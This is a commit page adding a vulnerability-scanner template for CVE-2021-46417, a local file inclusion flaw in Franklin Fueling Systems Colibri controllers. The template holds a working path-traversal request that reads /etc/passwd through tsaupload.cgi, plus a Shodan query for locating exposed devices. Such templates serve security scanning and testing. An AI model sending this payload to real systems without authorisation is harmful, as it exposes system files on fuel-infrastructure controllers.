Merge pull request #4249 from For3stCo1d/CVE-2021-46417.yaml

Create CVE-2021-46417.yaml
patch-1
Prince Chaddha 2022-04-28 01:38:59 +05:30 committed by GitHub
commit aaf32a716a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: CVE-2021-46417
info:
name: Franklin Fueling Systems Colibri Controller Module - Local File Inclusion
author: For3stCo1d
severity: high
reference:
- https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-46417
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-46417
cwe-id: CWE-22
metadata:
shodan-query: http.html:"Franklin Fueling Systems"
tags: cve,cve2021,franklinfueling,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"